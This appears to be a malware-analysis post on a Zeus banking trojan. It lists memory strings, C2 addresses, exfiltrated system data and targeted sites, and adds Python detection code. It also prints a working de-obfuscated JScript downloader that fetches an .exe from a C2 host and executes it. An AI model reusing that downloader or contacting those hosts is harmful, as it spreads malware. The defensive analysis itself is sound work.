PhishCentral is a resource for all security researchers with a focus on phishing and spam related malware. All information provided at this site is to be used only for research and learning. If you want samples of the malware reported on this site for further analysis and research, send your requests to samples@phishcentral.com

Malware - Zeus | Apr 2017

Here are some of the characteristics of a current version of the Zeus banking malware.

Upon execution, the malware spawns a process named explorer.exe, and that process then does the actual work.

PDB file names recovered from memory (not all of them are the malware's own):

explorer.pdb
ntdll.pdb
kernel32.pdb
kernelbase.pdb
RSDSqc
apphelp.pdb
msvcrt.pdb
RSDS~S
oleaut32.pdb
RSDSzNh
combase.pdb
RSDS,9%
powrprof.pdb
advapi32.pdb
RSDSGk
user32.pdb
gdi32.pdb
shcore.pdb
RSDSB*
shlwapi.pdb
shell32.pdb
RSDSmEi? r
UxTheme.pdb
dwmapi.pdb
twinapi.pdb
d3d11.pdb
dcomp.pdb
sspicli.pdb
sechost.pdb
userenv.pdb
propsys.pdb
rpcrt4.pdb
SLC.pdb
profapi.pdb
dxgi.pdb
sppc.pdb
imm32.pdb
msctf.pdb
ws2_32.pdb
nsi.pdb
RSDSS=[
dnsapi.pdb
RSDS}=
wininet.pdb
iertutil.pdb
cryptsp.pdb
rsaenh.pdb
bcrypt.pdb
cryptbase.pdb
bcryptprimitives.pdb
secur32.pdb
OnDemandConnRouteHelper.pdb
Kernel.Appcore.pdb
winhttp.pdb
urlmon.pdb
ole32.pdb
RSDS9h
mswsock.pdb
iphlpapi.pdb
RSDSh1
winnsi.pdb
rasadhlp.pdb
RSDSuY
fwpuclnt.pdb
comctl32.pdb

C2 information:

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
HTTP/1.1
Connection: close
urlmon.dll
ObtainUserAgentString
185.121.177.53
185.121.177.177
45.63.25.55
111.67.16.202
142.4.204.111
142.4.205.47
31.3.135.232
62.113.203.55
37.228.151.133
144.76.133.38

HTTP connections:

http://health.worldwidecons.ltd/index.php
Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
health.worldwidecons.ltd
/index.php

health.worldwidecons.ltd
health.worldwidecons.ltd
C:\Windows\System32\rasadhlp.dll
health.worldwidecons.ltd
health.worldwidecons.ltd
LRPC-4ad3f41e1dd17fdfd8
LRPC-4ad3f41e1dd17fdfd8
LRPC-ce28dc8b8c59856b80
Accept: */*
UserName
health.worldwidecons.ltd
Host: health.worldwidecons.ltd
POST /index.php HTTP/1.1
health.worldwidecons.ltd
health.worldwidecons.ltd

http://health.worldwidecons.ltd/index.php
qqqqqqqqqqqqqqqq
health.worldwidecons.ltd
POST /index.php HTTP/1.1
Host: health.worldwidecons.ltd
dtl.snocediwdlrow.htlaeh
health.worldwidecons.ltd
POST /index.php HTTP/1.1
health.worldwidecons.ltd
Host: health.worldwidecons.ltd
health.worldwidecons.ltd
POST /index.php HTTP/1.1
dtl.snocediwdlrow.htlaeh
Host: health.worldwidecons.ltd
POST /index.php HTTP/1.1
POST /index.php HTTP/1.1
health.worldwidecons.ltd
health.worldwidecons.ltd
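As an added example (not part of the original post), here is a small Python matcher that turns the C2 IPs, the C2 domain, the POST /index.php check-in and the hardcoded User-Agent listed above into detection logic run over a few proxy-log lines. The log layout, the sample lines and the memory strings are constructed for this example. Note that the strings dump above also contains the domain reversed (dtl.snocediwdlrow.htlaeh), so the string matcher checks both orientations.

```python
import re

# Indicators copied from the post's C2 and HTTP-connection lists above.
C2_IPS = {
    "185.121.177.53", "185.121.177.177", "45.63.25.55", "111.67.16.202",
    "142.4.204.111", "142.4.205.47", "31.3.135.232", "62.113.203.55",
    "37.228.151.133", "144.76.133.38",
}
C2_DOMAIN = "health.worldwidecons.ltd"
C2_PATH = "/index.php"
# User-Agent hardcoded in the sample (an IE8-on-XP string); rare today, but a weak indicator on its own.
C2_USER_AGENT = ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; "
                 "Trident/4.0; .NET4.0C; .NET4.0E)")

# Proxy log layout assumed for this example (constructed, not a real product format):
#   <timestamp> <client-ip> <method> <url> <status> "<user-agent>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+'
    r'(?P<status>\d{3})\s+"(?P<ua>[^"]*)"$'
)
URL_RE = re.compile(r'^https?://([^/:]+)(?::\d+)?(/.*)?$', re.I)


def parse_line(line):
    """Split one proxy-log line into fields, or return None if it does not fit the layout."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    u = URL_RE.match(rec["url"])
    if not u:
        return None
    rec["host"] = u.group(1).lower()
    rec["path"] = u.group(2) or "/"
    return rec


def classify(rec):
    """Return the indicator names a parsed record matches; an empty list means no match."""
    hits = []
    if rec["host"] in C2_IPS:
        hits.append("c2-ip")
    if rec["host"] == C2_DOMAIN:
        hits.append("c2-domain")
        # The check-in seen in memory is a POST to /index.php on the C2 host.
        if rec["method"] == "POST" and rec["path"] == C2_PATH:
            hits.append("c2-beacon-post")
    if rec["ua"] == C2_USER_AGENT:
        hits.append("zeus-user-agent")
    return hits


def scan_log(lines):
    """Map 1-based line numbers of matching lines to their indicator hits."""
    results = {}
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is not None:
            hits = classify(rec)
            if hits:
                results[n] = hits
    return results


def find_domain_strings(memory_strings):
    """The strings dump above contains 'dtl.snocediwdlrow.htlaeh', the C2 domain stored
    reversed; match both orientations so that trick does not hide the indicator."""
    wanted = {C2_DOMAIN, C2_DOMAIN[::-1]}
    return [s for s in memory_strings if s.strip().lower() in wanted]


# Constructed sample input: four proxy-log lines and a few strings from a memory dump.
SAMPLE_LOG = [
    '2017-04-12T10:03:11Z 10.0.0.5 GET http://www.example.com/ 200 '
    '"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"',
    '2017-04-12T10:03:15Z 10.0.0.5 POST http://health.worldwidecons.ltd/index.php 200 '
    '"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)"',
    '2017-04-12T10:04:02Z 10.0.0.7 GET http://185.121.177.53/ 404 '
    '"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"',
    '2017-04-12T10:04:30Z 10.0.0.9 GET http://health.worldwidecons.ltd/index.php 200 "curl/7.52.1"',
]
SAMPLE_STRINGS = ["LRPC-4ad3f41e1dd17fdfd8", "dtl.snocediwdlrow.htlaeh",
                  "Accept: */*", "health.worldwidecons.ltd"]

if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(hits)}")
    print("domain strings in memory:", find_domain_strings(SAMPLE_STRINGS))
```

The IP and domain matches are the strong signals; the User-Agent string on its own is only worth raising the score of a line that already hits the domain or path, as the sample log shows (line 2 hits all three, line 4 hits the domain only).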

System info sent back to the C2:

ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\User\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=WIN-P63U3EMH5QC
ComSpec=C:\Windows\system32\cmd.exe
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Users\User
LOCALAPPDATA=C:\Users\User\AppData\Local
LOGONSERVER=\\WIN-P63U3EMH5QC
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 70 Stepping 1, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=4601
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files
PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
PUBLIC=C:\Users\Public
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\User~1\AppData\Local\Temp
TMP=C:\Users\User~1\AppData\Local\Temp
USERDOMAIN=WIN-P63U3EMH5QC
USERDOMAIN_ROAMINGPROFILE=WIN-P63U3EMH5QC
USERNAME=User
USERPROFILE=C:\Users\User
windir=C:\Windows

Misc information (can be used as IOCs):

Cookie:username@windowssearch.com/
Cookie:username@wireshark.org/

Connection: close
X-Powered-By: PHP/5.4.45-0+deb7u2
<!ENTITY RightTeeArrow "&#x21A6;">
<!ENTITY mapsto "&#x21A6;">
<!ENTITY DownTeeArrow "&#x21A7;">
<!ENTITY mapstodown "&#x21A7;">
<!ENTITY larrhk "&#x21A9;">
<!ENTITY hookleftarrow "&#x21A9;">
<!ENTITY rarrhk "&#x21AA;">
<!ENTITY hookrightarrow "&#x21AA;">
<!ENTITY larrlp "&#x21AB;">
<!ENTITY looparrowleft "&#x21AB;">
<!ENTITY rarrlp "&#x21AC;">
<!ENTITY looparrowright "&#x21AC;">
<!ENTITY harrw "&#x21AD;">
<!ENTITY leftrightsquigarrow "&#x21AD;">
<!ENTITY nharr "&#x21AE;">
<!ENTITY nleftrightarrow "&#x21AE;">


Websites targeted

The list is very long - they are not leaving any industry out!
Here's just one snippet:

aa.net.nz
aafes.com
abm-energie.de
accretivehealth.com
aceinsurance.com.au
action-inter.com
activedocs.com
aeat.co.uk
afimilk.co.il
aftonxchange.com
agencerecherche.fr
agencywow.com
akd.nl
aksel.com.tr
albil.com.tr
allianz.hr
alturkigroup.net
ana.co.jp
aproposgeschenk.de

Here is the de-obfuscated script of one of the downloaders, by the way:

The code below is the part that grabs the payload from the C2 and executes it.
---------------------------
// WScript.Shell: used only to resolve the user's Templates special folder
var wsh = new ActiveXObject("wscript.shell");
// Shell.Application: used at the end to launch the dropped file
var sh = new ActiveXObject("shell.application");
// MSXML2.XMLHTTP: the HTTP client that fetches the payload
var HTTP = new ActiveXObject("MSXML2.XMLHTTP");
// ADODB.Stream: writes the binary response body to disk
var Stream = new ActiveXObject("ADODB.Stream");

// Drop path: <Templates folder>\<random number>.exe
var path = wsh.SpecialFolders("Templates") + "\\" + ((Math.random() * 999999) + 9999 | 0) + ".exe";

// Synchronous GET to the C2; only continues on HTTP 200
HTTP.Open("GET", "http://forum.glotran.club/rXKAdoWqgi.php", false);
HTTP.Send();
if (HTTP.Status == 200) {
    Stream.Open();
    Stream.Type = 1;                 // adTypeBinary
    Stream.Write(HTTP.ResponseBody);
    Stream.Position = 0;
    Stream.SaveToFile(path, 2);      // adSaveCreateOverWrite
    Stream.Close();
    sh.ShellExecute(path, "", "", "open", 1);   // run the payload, window shown normally
}
---------------------------
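Added example (not the post's code or any project's code): a Python heuristic that flags the download, write-to-disk and execute chain in a de-obfuscated WSH/JScript script like the one above, keyed on the COM ProgIDs and calls it strings together. It is run on the script above and on a constructed benign script. The network ProgIDs other than MSXML2.XMLHTTP are an assumption added for generality; because the check relies on literal ProgIDs and method names, it is meant for de-obfuscated source as the author shows it, not for the obfuscated original.

```python
import re

# ProgIDs and calls the downloader above chains together: fetch over HTTP, write the body
# to disk, launch it. Assumption: the extra network ProgIDs are other COM HTTP clients;
# the page's sample uses only MSXML2.XMLHTTP.
NETWORK_PROGIDS = ("msxml2.xmlhttp", "msxml2.serverxmlhttp", "winhttp.winhttprequest")
FILE_PROGIDS = ("adodb.stream",)
EXEC_PROGIDS = ("shell.application", "wscript.shell")
EXEC_CALLS = ("shellexecute", ".run(", ".exec(")

PROGID_RE = re.compile(r'new\s+ActiveXObject\s*\(\s*["\']([^"\']+)["\']\s*\)', re.I)
URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.I)
# An .exe path built from a SpecialFolders() lookup, as in the drop path above.
DROP_RE = re.compile(r'SpecialFolders\s*\([^)]*\).*?\.exe', re.I | re.S)


def analyze_script(src):
    """Report the ProgIDs, URLs and download/write/execute stages found in a script."""
    progids = {m.group(1).lower() for m in PROGID_RE.finditer(src)}
    low = src.lower()
    f = {
        "progids": sorted(progids),
        "urls": URL_RE.findall(src),
        "downloads": any(p.startswith(n) for p in progids for n in NETWORK_PROGIDS),
        "writes_file": any(p in progids for p in FILE_PROGIDS) and "savetofile" in low,
        "executes": any(p in progids for p in EXEC_PROGIDS)
                    and any(c in low for c in EXEC_CALLS),
        "drops_exe_in_special_folder": DROP_RE.search(src) is not None,
    }
    # Only the full chain is called a downloader; a single stage alone is too common.
    f["verdict"] = ("downloader" if f["downloads"] and f["writes_file"] and f["executes"]
                    else "no-download-chain")
    return f


# The de-obfuscated script shown in the post, used here as test input.
DOWNLOADER = r"""
var wsh = new ActiveXObject("wscript.shell");
var sh = new ActiveXObject("shell.application");
var HTTP = new ActiveXObject("MSXML2.XMLHTTP");
var Stream = new ActiveXObject("ADODB.Stream");
var path = wsh.SpecialFolders("Templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
HTTP.Open("GET", "http://forum.glotran.club/rXKAdoWqgi.php", false); HTTP.Send(); if (HTTP.Status == 200) {
Stream.Open(); Stream.Type = 1; Stream.Write(HTTP.ResponseBody);
Stream.Position = 0; Stream.SaveToFile(path, 2);
Stream.Close(); sh.ShellExecute(path, "", "", "open", 1); }
"""

# Constructed benign script: writes a log file, no network access, no execution.
BENIGN = r"""
var fso = new ActiveXObject("Scripting.FileSystemObject");
var f = fso.OpenTextFile("C:\\temp\\app.log", 8, true);
f.WriteLine("started"); f.Close();
"""

if __name__ == "__main__":
    for name, src in (("downloader", DOWNLOADER), ("benign", BENIGN)):
        r = analyze_script(src)
        print(f"{name}: {r['verdict']}, progids={r['progids']}, urls={r['urls']}")
```

The drop-path observation is worth an alert of its own: an .exe written under the user's Templates folder and then launched from a script host is not something a legitimate script normally does, so it pairs well with the verdict above.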
